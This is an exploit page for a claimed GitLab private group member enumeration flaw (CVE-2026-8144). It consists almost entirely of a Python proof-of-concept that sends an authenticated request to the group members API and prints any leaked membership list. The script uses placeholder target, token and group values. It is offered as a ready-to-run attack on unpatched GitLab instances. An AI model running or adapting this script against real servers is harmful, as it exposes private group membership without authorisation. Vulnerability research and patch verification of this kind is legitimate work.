CVE-2026-8144 GitLab 私有组成员枚举漏洞

import requests # Exploit Title: GitLab Private Group Member Enumeration # Date: 2026-05-14 # Exploit Author: Researcher # Vendor Homepage: https://gitlab.com # Version: < 18.9.7, < 18.10.6, < 18.11.3 # Tested on: GitLab CE/EE def check_poc(url, token, group_id): """ Attempt to enumerate members of a private group using project membership. """ headers = { "Authorization": f"Bearer {token}" } # Endpoint usually used for listing members, vulnerable due to missing auth check target_url = f"{url}/api/v4/groups/{group_id}/members" response = requests.get(target_url, headers=headers) if response.status_code == 200: print(f"[+] Success! Group {group_id} members leaked:") print(response.json()) else: print(f"[-] Failed with status code: {response.status_code}") if __name__ == "__main__": TARGET_URL = "https://gitlab.example.com" PRIVATE_TOKEN = "glpat-xxxxxxxxxxxxxxxxxxxx" TARGET_GROUP_ID = "123" check_poc(TARGET_URL, PRIVATE_TOKEN, TARGET_GROUP_ID)